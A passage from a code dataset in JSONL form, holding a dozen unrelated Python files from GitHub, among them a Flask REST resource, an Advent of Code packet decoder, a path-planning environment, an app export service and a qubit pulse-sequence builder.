ax.set_yscale('log')\n return fig ","repo_name":"Motylek137/metody_numeryczne","sub_path":"laboratorium 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41165436332","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef moving_average(x, width):\n return np.convolve(x, np.ones(width), 'same') / width\n\n\ndef show_curve(positions):\n x = np.arange(0, len(positions))\n y = positions\n plt.plot(x, y, color='red', linewidth=1)\n plt.show()\n\n\nif __name__ == '__main__':\n # pos = np.sin(np.arange(0, 2, 0.01))\n # show_curve(pos)\n from video_source import VideoSource\n from AlphaPose.AlphaDetector import AlphaDetector\n\n video_path = './4.mp4'\n vs = VideoSource(video_path, webcam=False)\n dt = AlphaDetector()\n positions = []\n ratio = []\n for ori, fid in vs:\n pose_dic = dt.pre_one(ori)\n if not pose_dic:\n continue\n positions.append(pose_dic['19'][1])\n ratio.append(pose_dic['19'][1] - pose_dic['18'][1])\n print(pose_dic['19'][1])\n print(pose_dic['18'][1] - pose_dic['19'][1])\n\n positions = np.array(positions)\n avg_positions = moving_average(positions, 3)\n\n ratio = np.array(ratio)\n velocitys = positions[1:] - positions[:-1]\n modified_ratio = (ratio[1:] + ratio[:-1]) / 2\n modified_velocitys = velocitys * (170 / modified_ratio)\n\n avg_velocity = moving_average(modified_velocitys, 3)\n show_curve(modified_velocitys)\n show_curve(avg_velocity)\n # show_curve(positions)\n # show_curve(avg_positions)\n","repo_name":"WWWzk/smart-sport","sub_path":"show_curve.py","file_name":"show_curve.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16757818000","text":"'''\n给定一个由空格分割单词的句子 S。每个单词只包含大写或小写字母。\n\n我们要将句子转换为 “Goat Latin”(一种类似于 猪拉丁文 - Pig Latin 的虚构语言)。\n\n山羊拉丁文的规则如下:\n\n如果单词以元音开头(a, e, i, o, u),在单词后添加\"ma\"。\n例如,单词\"apple\"变为\"applema\"。\n\n如果单词以辅音字母开头(即非元音字母),移除第一个字符并将它放到末尾,之后再添加\"ma\"。\n例如,单词\"goat\"变为\"oatgma\"。\n\n根据单词在句子中的索引,在单词最后添加与索引相同数量的字母'a',索引从1开始。\n例如,在第一个单词后添加\"a\",在第二个单词后添加\"aa\",以此类推。\n返回将 S 转换为山羊拉丁文后的句子。\n\n示例 1:\n\n输入: \"I speak Goat Latin\"\n输出: \"Imaa peaksmaaa oatGmaaaa atinLmaaaaa\"\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/goat-latin\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nclass Solution(object):\n def toGoatLatin(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n S = S.split()\n new = []\n for i,word in enumerate(S):\n if word[0] in ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']:\n new.append(word+'ma'+'a'*(i+1))\n else:\n w = word[1:]+word[0]\n new.append(w+'ma'+'a'*(i+1))\n return ' '.join(new)\n\nS = \"I speak Goat Latin\"\nSolution().toGoatLatin(S)","repo_name":"Code-ZYJ/Leecode_everyday","sub_path":"山羊拉丁文.py","file_name":"山羊拉丁文.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1354571335","text":"from flask import request, jsonify, json\nfrom flask_restful import Resource\nfrom models.categoria import CategoriaModel\nfrom sqlalchemy.orm import sessionmaker\nfrom db import session\n\n\nclass CategoriaList(Resource):\n def get(self):\n categorias = session.query(CategoriaModel).order_by(CategoriaModel.nome)\n categorias = [c.serialize for c in categorias]\n return jsonify(categorias) # jsonify({'store': stores})\n\n\nclass CategoriaResource(Resource):\n def get(self, id):\n categoria = session.query(CategoriaModel).get(id)\n return jsonify(categoria.serialize)\n\n def post(self, categoria):\n session.add(CategoriaModel(request.json['id'], request.json['nome']))\n session.commit()\n return json.dumps(request.json), 201\n\n def delete(self, id):\n categoria = session.query(CategoriaModel).get(id)\n session.delete(categoria)\n session.commit()\n return jsonify(categoria.serialize)\n\n def put(self, id):\n categoria = session.query(CategoriaModel).get(id)\n categoria.nome = request.json.get('nome', categoria.nome)\n session.commit()\n return jsonify(categoria.serialize)\n # return {'item': None}, 404\n\n","repo_name":"jgbcientista/Sistema-de-Monitoramento-JAVA","sub_path":"smt-frontend/server/resources/categoria.py","file_name":"categoria.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"5694601283","text":"# tipper type, tipped\r\na = float(input(\"type the total $ amount of your bill than press enter__\"))\r\nc = a*.15\r\nd = a*.20\r\ne = a* 2\r\nb = (c, d, e)\r\nr=\"15%\"\r\nf='20%'\r\nv=\"200%\"\r\nprint(\"a tip amount of 15% would equal=\", c)\r\nprint(\"a tip amount of\",f,\"would equal =\",d)\r\nprint(\"If you want to tip big tip\", v, \"=\", e)\r\n#added extra to play with ,var,, function\r\ninput(\"press enter to end\")\r\n","repo_name":"nibbletobits/nibbletobits","sub_path":"python/day 2 home work 3.py","file_name":"day 2 home work 3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70604614457","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom math import prod\nfrom pathlib import Path\n\nfrom helpers import read_input_as_string_array\n\n\n@dataclass\nclass Packet:\n version: int\n type_id: int\n literal_value: int | None\n sub_packets: list[Packet] | None\n\n\ndef read_input(filename: Path | str) -> str:\n input_string = read_input_as_string_array(filename)[0]\n return convert_hex_to_binary(input_string)\n\n\ndef convert_hex_to_binary(hex_string: str) -> str:\n chunks = [hex_string[i : i + 2] for i in range(0, len(hex_string), 2)]\n return \"\".join([\"{:08b}\".format(int(chunk, 16)) for chunk in chunks])\n\n\ndef parse_packets(\n binary_data: str,\n trim_bits: bool = True,\n count: int | None = None,\n) -> tuple[list[Packet], str]:\n packets: list[Packet] = []\n\n while binary_data != \"\":\n try:\n packet_version, binary_data = get_packet_version(binary_data)\n packet_type_id, binary_data = get_packet_type_id(binary_data)\n literal_value = None\n sub_packets = None\n\n if packet_type_id == 4:\n literal_value, binary_data = get_literal_value(binary_data, trim_bits)\n else:\n sub_packets, binary_data = get_operator(binary_data)\n\n if literal_value or sub_packets:\n packets.append(\n Packet(\n packet_version,\n packet_type_id,\n literal_value,\n sub_packets,\n ),\n )\n except (IndexError, ValueError):\n break\n\n if count and len(packets) == count:\n break\n\n return packets, binary_data\n\n\ndef get_packet_version(binary_data: str) -> tuple[int, str]:\n return int(binary_data[:3], 2), binary_data[3:]\n\n\ndef get_packet_type_id(binary_data: str) -> tuple[int, str]:\n return int(binary_data[:3], 2), binary_data[3:]\n\n\ndef get_literal_value(binary_data: str, trim_bits: bool) -> tuple[int, str]:\n start_index = 0\n literal_value_string = \"\"\n\n while True:\n indicator_bit = int(binary_data[start_index])\n\n start_index = start_index + 1\n end_index = start_index + 4\n\n literal_value_string += binary_data[start_index:end_index]\n start_index = end_index\n\n if indicator_bit == 0:\n break\n\n literal_value = int(literal_value_string, 2)\n\n if trim_bits:\n prefix_length = 6\n remainder = (start_index + prefix_length) % 4\n\n while remainder > 0:\n start_index += 1\n remainder = (start_index + prefix_length) % 4\n\n return literal_value, binary_data[start_index:]\n\n\ndef get_operator(binary_data: str) -> tuple[list[Packet], str]:\n length_type_id = int(binary_data[0])\n\n if length_type_id == 0:\n start_index = 16\n length = int(binary_data[1:start_index], 2)\n end_index = start_index + length\n sub_binary_data = binary_data[start_index:end_index]\n sub_packets, _ = parse_packets(sub_binary_data, trim_bits=False)\n binary_data = binary_data[end_index:]\n else:\n start_index = 12\n length = int(binary_data[1:start_index], 2)\n sub_binary_data = binary_data[start_index:]\n sub_packets, binary_data = parse_packets(\n sub_binary_data,\n trim_bits=False,\n count=length,\n )\n\n return sub_packets, binary_data\n\n\ndef sum_version_numbers(packets: list[Packet] | None) -> int:\n return (\n sum(\n packet.version + sum_version_numbers(packet.sub_packets)\n for packet in packets\n )\n if packets\n else 0\n )\n\n\ndef evaluate_packets(packet: Packet) -> int:\n if packet.type_id == 4:\n return packet.literal_value or 0\n\n if not packet.sub_packets:\n return 0\n\n if packet.type_id == 0:\n return sum(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 1:\n return prod(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 2:\n return min(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 3:\n return max(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 5:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n > evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n if packet.type_id == 6:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n < evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n if packet.type_id == 7:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n == evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n return 0\n\n\ndef part_one(binary_data: str) -> int:\n packets, _ = parse_packets(binary_data)\n return sum_version_numbers(packets)\n\n\ndef part_two(binary_data: str) -> int:\n packets, _ = parse_packets(binary_data)\n return evaluate_packets(packets[0])\n\n\nif __name__ == \"__main__\":\n binary_input: str = read_input(\"input.txt\")\n print(part_one(binary_input))\n print(part_two(binary_input))\n","repo_name":"avendesora/advent-of-code-python","sub_path":"advent_of_code_2021/day16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"21953044763","text":"#!/usr/bin/env python\nfrom bs4 import BeautifulSoup\nimport sys\nimport json\nimport argparse\nimport re\nfrom slugify import slugify\n\ntool_chest_html = 'do-tool-chest.html'\n\nclass ToolChest:\n def __init__(self):\n self.soup = None\n self.tool_list = None\n self.categories_list = None\n\n def body(self):\n if self.soup == None:\n with open(tool_chest_html) as f:\n self.soup = BeautifulSoup(f, 'html.parser', from_encoding=\"ascii\")\n return self.soup.body\n\n def section(self, section_id):\n sections = self.body().find_all('section')\n for section in sections:\n if section.has_attr('id') and section_id in section.get('id'):\n return section\n\n def categories(self):\n \"\"\" Returns a dict, where the key is the category id, and the value\n is the category name. \"\"\"\n if self.categories_list != None: return self.categories_list\n\n # The 'tool-chest' section of the HTML contains categories as well as\n # tool content\n section = self.section(\"tool-chest\")\n\n # The 'dropdown-menu' ul class has the categories\n ul = section.find('ul', attrs={\"class\": \"dropdown-menu\"} )\n links = ul.find_all(\"a\", attrs={\"class\": \"filter\"} )\n\n d = {}\n for link in links:\n # The 'data-filter' attribute in the HTML is the ID for the category\n text = link.get_text()\n # Strip leading '.' from category id\n f = link['data-filter']\n #d[f.strip('.')] = text.encode('ascii', 'ignore')\n d[f.strip('.')] = text\n\n self.categories_list = d\n return self.categories_list\n\n def categories_more(self):\n \"\"\" Returns an array of dicts with the following keys:\n - type (the category type-id)\n - category (the category name)\n - cat (slugified category)\n \"\"\"\n l=[]\n for t,c in self.categories().items():\n l.append({\"type\":t, \"category\":c, \"cat\": slugify(c) })\n return l\n\n def tools(self):\n \"\"\" Looks up the section of the data with tools and returns a dict\n with the key being the tool-id, and the value being a dict of\n all the attributes about the tool, including:\n - name, id, class, link, img, text, category\n \"\"\"\n if self.tool_list != None: return self.tool_list\n\n section = self.section(\"tool-chest\")\n div = section.find('div', attrs={\"id\": \"mixitup\", \"class\": \"panel\"} )\n tools = div.find_all('div')\n\n d = []\n for tool in tools:\n # data-name is the tool title\n # data-id is the id of the tool\n # class contains the classes applying to this tool, including categories\n tool_name, tool_id = tool.get(\"data-name\"), tool.get(\"data-id\")\n tool_classes = [l for l in tool.get(\"class\")]\n link, img = tool.a.get(\"href\"), tool.img.get(\"src\")\n text = tool.p.get_text()\n categories = []\n for c_id, c_n in self.categories().items():\n if c_id in tool_classes: categories.append(c_n)\n #categories = [x for x, y in zip(self.categories().keys(), tool_classes) if y == x]\n #print(\"name %s id %s link %s img %s\\nclass '%s'\\ntext '%s'\\n\" % (tool_name, tool_id, link, img, tool_classes, text))\n h = {'name': tool_name, 'id': tool_id, 'class': tool_classes, 'link': link, 'img': img, 'text': text, 'category': categories, 'cat': slugify(categories[0]) }\n d.append(h)\n\n self.tool_list = d\n return self.tool_list\n\n def category(self, name):\n \"\"\" Looks up the category of each tool and returns them as a list. \"\"\"\n cat_list = [name]\n if type(name) == type([]):\n cat_list = name\n\n cat_id_list = []\n for type_id, c in self.categories().items():\n for name in cat_list:\n if name == c:\n cat_id_list.append(type_id)\n\n tool_list = []\n for tool in self.tools():\n for cat_id in cat_id_list:\n if cat_id in tool[\"class\"]:\n #print(\"tool %s\" % d[\"name\"])\n tool_list.append(tool)\n\n return tool_list\n\ndef main():\n page = ToolChest()\n\n parser = options()\n o = parser.parse_args()\n if o.categories == None and o.categories_more == None and o.tools == None:\n parser.print_help()\n exit(1)\n\n if o.categories != None:\n if len(o.categories) > 0:\n print(json.dumps( page.category(o.categories) ))\n else:\n print(json.dumps(page.categories()))\n\n if o.categories_more != None:\n if len(o.categories_more) > 0:\n print(json.dumps( page.category(o.categories) ))\n else:\n print(json.dumps(page.categories_more()))\n\n if o.tools != None:\n print( json.dumps( page.tools() ) )\n\n return(0)\n\ndef options():\n parser = argparse.ArgumentParser(description='Decode the XebiaLabs DevOps tools page')\n parser.add_argument('--categories', nargs='*', help='List all categories of tools, or all tools in a category')\n parser.add_argument('--categories-more', nargs='*', help='List all categories of tools, or all tools in a category, in more detail')\n parser.add_argument('--tools', nargs='*', help='List all the tools')\n return parser\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"peterwwillis/devopsyoga-content","sub_path":"tools/tool_chest/tool_chest.py","file_name":"tool_chest.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"22"} +{"seq_id":"8831437268","text":"from __future__ import absolute_import\n\nfrom mysite.celery_app import app\nfrom .classes import PayoutManager\nfrom django.core.cache import cache\n\nLOCK_EXPIRE = 300 # Lock expires in 5 minutes\nSHARED_LOCK_NAME = \"payout_task\"\n\n@app.task(bind=True)\ndef payout_task(self, contests=None):\n lock_id = '%s-LOCK-payout[%s]'\n\n acquire_lock = lambda: cache.add(lock_id, 'true', LOCK_EXPIRE)\n release_lock = lambda: cache.delete(lock_id)\n\n if acquire_lock():\n try:\n pm = PayoutManager()\n pm.payout(contests)\n finally:\n release_lock()\n else:\n self.retry(countdown=1, max_retries=100)\n\n\n\n","repo_name":"nakamotohideyoshi/draftboard-web","sub_path":"contest/payout/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35497148856","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport gridfs\nfrom bson import objectid\n\n\nclient = MongoClient(port=27017)\n\ndb = client.inventorydb\n\n\n\nfs = gridfs.GridFS(db)\n\npath_in = 'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/How-to-Save-a-Life-Study-Manual.pdf'\n\n\n\nwith open(path_in,'rb') as filein:\n result = fs.put(filein, content_type='application/pdf', filename='How-to-Save-a-Life-Study-Manual.pdf')\n pprint(result)\n\npath_in = 'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/languagenow_english.jpg'\npath_out = 'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/OUTPUT_languagenow_english.jpg'\n\n\nwith open(path_in,'rb') as filein:\n result = fs.put(filein, filename='languagenow_english.jpg')\n pprint(result)\n\nfile = fs.find_one({'filename': 'languagenow_english.jpg'})\nimage = file.read()\nwith open(path_out,\"wb\") as output_file:\n output_file.write(image)\n output_file.close();\n\n\n\n","repo_name":"victorbertoldo/dadobipolar","sub_path":"MongoDB/python_mongo/GRIDFS_Demo.py","file_name":"GRIDFS_Demo.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72111842296","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport numpy as np\nimport cv2\n\nfrom obstacleSpace import isInObstacleWs\n\nclass Environment:\n def __init__(self, resolution, botRadius):\n self.res = resolution\n self.totalClearance = botRadius\n self.startPt = [0.0, 0.0]\n self.goalPt = [8.0,4.5]\n self.MAP_X, self.MAP_Y = 11.1, 10.1\n self.GRID_NX, self.GRID_NY = int(self.MAP_X/self.res), int(self.MAP_Y/self.res)\n self.obstacleSet = self.getObstacleSet()\n \n self.obstacleMap = self.getObstacleMap()\n \n self.runningMap = np.copy(self.obstacleMap)\n self.renderCounter = 0\n \n def getObstacleSet(self):\n outputSet = set([])\n # create the set using for loops\n for p in range(0,int(self.MAP_X/self.res+1)):\n for q in range(0,int(self.MAP_Y/self.res+1)):\n if (isInObstacleWs((p+0.5)*self.res,(q+0.5)*self.res, self.totalClearance)):\n outputSet.add((p,q))\n return outputSet\n \n def isPtInObs(self, x, y):\n temp = self.getGridPt([x,y])\n return temp in self.obstacleSet\n \n def isGridPtInObs(self, pt):\n return pt in self.obstacleSet\n \n def getGridPt(self,pt):\n return (math.floor(pt[0]/self.res), math.floor(pt[1]/self.res))\n \n def updateMap(self,display,pt,val):\n # For Display\n # set up color map for display\n # 0 - empty, white\n # 1 - startPt, red\n # 2 - goalPt, green\n # 3 - visited, yellow\n # 4 - obstacle, black\n # 5 - path, blue\n red =0\n green =0\n blue =0\n if val ==0:\n red,green,blue = 255,255,255\n elif val == 1:\n red,green,blue = 255,0,0\n elif val == 2:\n red,green,blue = 0,255,0\n elif val == 3:\n red,green,blue = 255,255,0\n elif val == 4:\n red,green,blue = 0,0,0\n elif val == 5:\n red,green,blue = 0,0,255\n else:\n # to catch errors\n red,green,blue = 255,0,255\n display[pt[0],pt[1],0] = blue\n display[pt[0],pt[1],1] = green\n display[pt[0],pt[1],2] = red\n return display\n \n def getObstacleMap(self):\n # fill a np array image with obstacles for rendering\n obsMap = 255 * np.ones((self.GRID_NX+1,self.GRID_NY+1,3))\n \n for obs in self.obstacleSet:\n obsMap = self.updateMap(obsMap, obs, 4)\n return obsMap\n \n def render(self):\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.startPt),1)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%60 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def setVisitedAndRender(self, pt):\n self.runningMap = self.updateMap(self.runningMap,pt,3)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%60 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def setPathAndRender(self, pt):\n self.runningMap = self.updateMap(self.runningMap,pt,5)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.startPt),1)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%2 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def reset(self):\n # reset image to obstacle\n self.runningMap = np.copy(self.obstacleMap)\n self.renderCounter = 0\n pass","repo_name":"amrish1222/motionPlanningAlgs","sub_path":"source/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33755161353","text":"import struct\n\nfd_out = open('bin_file', 'wb')\n\n#[2-byte ID][4-byte value]\n\nid = 0\nval = id\n\nfor i in range(50):\n entry = struct.pack('<HI', id, val)\n id += 1\n val = id\n\n fd_out.write(entry)\n fd_out.flush()\n\nfd_out.close()\n","repo_name":"paulohq/cosine","sub_path":"gem_bin_file.py","file_name":"gem_bin_file.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13284258831","text":"# -*- coding: utf8 -*-\n\"\"\"\n Created on 18/5/15.\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport urllib2\n\nimport requests\n\nfrom console.repositories.group import group_repo\nfrom console.repositories.market_app_repo import app_export_record_repo\nfrom console.repositories.region_repo import region_repo\nfrom console.services.app_config.app_relation_service import AppServiceRelationService\nfrom www.apiclient.baseclient import client_auth_service\nfrom www.apiclient.marketclient import MarketOpenAPI\nfrom www.apiclient.regionapi import RegionInvokeApi\nfrom www.tenantservice.baseservice import BaseTenantService\nfrom www.utils.crypt import make_uuid\n\nlogger = logging.getLogger(\"default\")\nbaseService = BaseTenantService()\napp_relation_service = AppServiceRelationService()\nmarket_api = MarketOpenAPI()\nregion_api = RegionInvokeApi()\n\n\nclass AppExportService(object):\n def create_export_repo(self, event_id, export_format, group_key, version):\n export_record = app_export_record_repo.get_export_record_by_unique_key(group_key, version, export_format)\n if export_record:\n return 409, \"已存在改导出类型的文件\", None\n\n if event_id is None:\n event_id = make_uuid()\n params = {\n \"event_id\": event_id,\n \"group_key\": group_key,\n \"version\": version,\n \"format\": export_format,\n \"status\": \"exporting\"\n }\n new_export_record = app_export_record_repo.create_app_export_record(**params)\n return 200, \"success\", new_export_record\n\n def export_current_app(self, team, export_format, app):\n event_id = make_uuid()\n data = {\"event_id\": event_id, \"group_key\": app.group_key, \"version\": app.version, \"format\": export_format,\n \"group_metadata\": app.app_template}\n region = self.get_app_share_region(app)\n if region is None:\n return 404, '无法查找当前应用分享所在数据中心', None\n region_api.export_app(region, team.tenant_name, data)\n export_record = app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n if export_record:\n logger.debug(\"update export record !\")\n export_record.event_id = event_id\n export_record.status = \"exporting\"\n export_record.update_time = datetime.datetime.now()\n export_record.save()\n new_export_record = export_record\n else:\n logger.debug(\"create export record !\")\n code, msg, new_export_record = self.create_export_repo(event_id, export_format, app.group_key, app.version)\n if code != 200:\n return code, msg, None\n return 200, \"success\", new_export_record\n\n def get_app_share_region(self, app):\n app_template = json.loads(app.app_template)\n apps = app_template[\"apps\"]\n first_app = apps[0]\n if first_app:\n region = first_app.get(\"service_region\", None)\n else:\n group = group_repo.get_group_by_id(app.tenant_service_group_id)\n if group:\n region = group.region_name\n else:\n return None\n \n if region:\n region_config = region_repo.get_region_by_region_name(region)\n if region_config:\n return region\n return None\n else:\n return None\n\n\n def get_export_status(self, team, app):\n app_export_records = app_export_record_repo.get_by_key_and_version(app.group_key, app.version)\n rainbond_app_init_data = {\n \"is_export_before\": False,\n }\n docker_compose_init_data = {\n \"is_export_before\": False,\n }\n\n region = self.get_app_share_region(app)\n if region is None:\n return 404, '无法查找当前应用分享所在数据中心', None\n if app_export_records:\n for export_record in app_export_records:\n if export_record.event_id and export_record.status == \"exporting\":\n try:\n res, body = region_api.get_app_export_status(region, team.tenant_name, export_record.event_id)\n result_bean = body[\"bean\"]\n if result_bean[\"status\"] in (\"failed\", \"success\"):\n export_record.status = result_bean[\"status\"]\n export_record.file_path = result_bean[\"tar_file_href\"]\n export_record.save()\n except Exception as e:\n logger.exception(e)\n\n if export_record.format == \"rainbond-app\":\n rainbond_app_init_data.update({\n \"is_export_before\": True,\n \"status\": export_record.status,\n \"file_path\": self._wrapper_director_download_url(region, export_record.file_path.replace(\"/v2\",\"\"))\n })\n if export_record.format == \"docker-compose\":\n docker_compose_init_data.update({\n \"is_export_before\": True,\n \"status\": export_record.status,\n \"file_path\": self._wrapper_director_download_url(region, export_record.file_path.replace(\"/v2\",\"\"))\n })\n\n result = {\"rainbond_app\": rainbond_app_init_data, \"docker_compose\": docker_compose_init_data}\n return 200, \"success\", result\n\n def __get_down_url(self, region_name, raw_url):\n region = region_repo.get_region_by_region_name(region_name)\n if region:\n return region.url + raw_url\n else:\n return raw_url\n\n def _wrapper_director_download_url(self, region_name, raw_url):\n region = region_repo.get_region_by_region_name(region_name)\n if region:\n splits_texts = region.url.split(\":\")\n if len(splits_texts) > 2:\n index = region.url.index(\":\", 6)\n return region.url[:index] + \":6060\" + raw_url\n else:\n return region.url + \":6060\" + raw_url\n\n def get_export_record(self, export_format, app):\n return app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n\n def get_export_record_status(self, app):\n records = app_export_record_repo.get_by_key_and_version(app.group_key, app.version)\n export_status = \"other\"\n # 有一个成功即成功,全部失败为失败,全部为导出中则显示导出中\n if not records:\n return \"unexported\"\n failed = True\n\n for record in records:\n if record.status == \"success\":\n return \"success\"\n if record.status != \"failed\":\n failed = False\n if failed:\n return \"failed\"\n else:\n return \"exporting\"\n\n def get_file_down_req(self, export_format, tenant_name, app):\n export_record = app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n region = self.get_app_share_region(app)\n\n download_url = self.__get_down_url(region, export_record.file_path)\n file_name = export_record.file_path.split(\"/\")[-1]\n url, token = client_auth_service.get_region_access_token_by_tenant(\n tenant_name, region)\n if not token:\n region_info = region_repo.get_region_by_region_name(region)\n if region_info:\n token = region_info.token\n\n req = urllib2.Request(download_url)\n if token:\n req.add_header(\"Authorization\", \"Token {}\".format(token))\n\n return req, file_name\n\n\nexport_service = AppExportService()\n","repo_name":"sunshine2995/console","sub_path":"console/services/app_import_and_export_service.py","file_name":"app_import_and_export_service.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27147235614","text":"__author__ = 'Nelson'\n\nfrom slab.instruments.awg.PulseSequence import *\nfrom numpy import arange, linspace, array\nfrom slab.experiments.Alex.ExpLib.PulseSequenceBuilder import *\nimport time\nimport visdom\nfrom liveplot import LivePlotClient\n\nclass QubitPulseSequence(PulseSequence):\n '''\n Parent class for all the single qubit pulse sequences.\n '''\n def __init__(self, name, cfg, expt_cfg, define_points, define_parameters, define_pulses, **kwargs):\n\n self.expt_cfg = expt_cfg\n self.cfg = cfg\n define_points()\n define_parameters()\n sequence_length = len(self.expt_pts)\n\n # if \"multimode\" not in name.lower():\n # cfg['awgs'][1]['upload'] = False\n # else:\n # cfg['awgs'][1]['upload'] = True\n calibration_pts = []\n\n if (expt_cfg['use_g-e-f_calibration']):\n calibration_pts = list(range(3))\n sequence_length+=3\n elif (expt_cfg['use_pi_calibration']):\n calibration_pts = list(range(2))\n sequence_length+=2\n print('calibration_pts =', calibration_pts)\n\n PulseSequence.__init__(self, name, cfg['awgs'], sequence_length)\n\n self.psb = PulseSequenceBuilder(cfg)\n self.pulse_sequence_matrix = []\n self.total_pulse_span_length_list = []\n self.total_flux_pulse_span_length_list = []\n self.flux_pulse_span_list = []\n\n for ii, pt in enumerate(self.expt_pts):\n # obtain pulse sequence for each experiment point\n define_pulses(pt)\n\n self.pulse_sequence_matrix.append(self.psb.get_pulse_sequence())\n self.total_pulse_span_length_list.append(self.psb.get_total_pulse_span_length())\n self.total_flux_pulse_span_length_list.append(self.psb.get_total_flux_pulse_span_length())\n\n if len(calibration_pts) > 0:\n\n for jj, pt in enumerate(calibration_pts):\n\n if self.name == 'rabi_thermalizer':\n define_pulses(jj+len(self.expt_pts))\n\n else:\n if jj ==0:\n self.psb.idle(10)\n if jj ==1:\n self.psb.append('q','cal_pi', self.pulse_type)\n if jj ==2:\n self.psb.append('q','cal_pi', self.pulse_type)\n self.psb.append('q', 'pi_q_ef', self.pulse_type)\n\n self.pulse_sequence_matrix.append(self.psb.get_pulse_sequence())\n self.total_pulse_span_length_list.append(self.psb.get_total_pulse_span_length())\n self.total_flux_pulse_span_length_list.append(self.psb.get_total_flux_pulse_span_length())\n\n print('total_pulse_span_length_list', self.total_pulse_span_length_list)\n\n max_length = self.psb.get_max_length(self.total_pulse_span_length_list)\n max_flux_length = self.psb.get_max_flux_length(self.total_flux_pulse_span_length_list)\n self.set_all_lengths(max_length)\n\n ###\n\n # flux pulse\n temp_seq_matrix = self.pulse_sequence_matrix[:]\n self.pulse_sequence_matrix = []\n # clears\n dummy = self.psb.get_total_pulse_span_length()\n dummy = self.psb.get_total_flux_pulse_span_length()\n\n flux_max_area_list = np.zeros(8)\n flux_max_power_list = np.zeros(8)\n for ii in range(len(self.expt_pts) + len(calibration_pts)):\n\n if self.name == 'rabi_thermalizer' or self.name == 'histogram_rabi_thermalizer':\n\n # print 'add rabi_thermalizer flux pulse'\n flux_total_span, flux_area_list, flux_power_list = define_pulses(ii, isFlux = True)\n\n flux_max_area_list = np.where(np.abs(flux_max_area_list) >= np.abs(flux_area_list), flux_max_area_list, flux_area_list)\n flux_max_power_list = np.where(flux_max_power_list >= flux_power_list, flux_max_power_list, flux_power_list)\n # flux_total_span = self.psb.get_total_pulse_span_length() # also clears\n\n # 0426 hack for ramsey fast flux scope, ignore cal pts\n # elif self.name == 